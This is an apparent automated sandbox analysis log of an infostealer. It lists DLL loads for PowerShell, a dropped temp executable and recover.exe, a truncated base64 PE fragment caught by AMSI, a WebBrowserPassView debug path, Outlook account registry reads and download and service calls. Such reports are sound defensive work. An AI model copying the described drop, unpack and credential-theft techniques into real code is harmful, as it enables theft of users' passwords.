Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: mrmcorer.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: efswrt.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Windows\System32\notepad.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\recover.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Jump to behavior

Source:	Binary string: CXZfASD.pdbTFnF source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000004.00000000.1506079336.0000000000C52000.00000002.00000001.01000000.0000000A.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe.0.dr
Source:	Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000006.00000002.3961045514.00000000049C0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000009.00000002.1601166608.0000000000400000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: CXZfASD.pdb source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000004.00000000.1506079336.0000000000C52000.00000002.00000001.01000000.0000000A.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe.0.dr

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEFAO

Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.0.dr

Static PE information: 0xBF16B7E7 [Tue Aug 4 18:05:27 2071 UTC]

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 6_2_0041D0CF LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

6_2_0041D0CF

Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.0.dr	Static PE information: section name: iVN#X-
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.0.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_004570CF push ecx; ret	6_2_004570E2
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_00435226 push ecx; ret	6_2_00435239
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_0045D9ED push esi; ret	6_2_0045D9F6
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_00457A00 push eax; ret	6_2_00457A1E
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_04AE2806 push ecx; ret	6_2_04AE2819
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_1000B126 push ecx; ret	6_2_1000B139
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_1002344D push esi; ret	6_2_10023456
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00446B75 push ecx; ret	9_2_00446B85
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00452BB4 push eax; ret	9_2_00452BC1
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044DDB0 push eax; ret	9_2_0044DDC4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044DDB0 push eax; ret	9_2_0044DDEC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0044B090 push eax; ret	10_2_0044B0A4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0044B090 push eax; ret	10_2_0044B0CC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00451D34 push eax; ret	10_2_00451D41
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00444E71 push ecx; ret	10_2_00444E81
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00414060 push eax; ret	11_2_00414074
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00414060 push eax; ret	11_2_0041409C
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00414039 push ecx; ret	11_2_00414049
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_004164EB push 0000006Ah; retf	11_2_004165C4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00416553 push 0000006Ah; retf	11_2_004165C4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00416555 push 0000006Ah; retf	11_2_004165C4

Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.0.dr

Static PE information: section name: iVN#X- entropy: 7.977676207256729

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 6_2_004062E2 ShellExecuteW,URLDownloadToFileW,

6_2_004062E2

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 6_2_0041AC43 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

6_2_0041AC43

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

6_2_0041D0CF

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
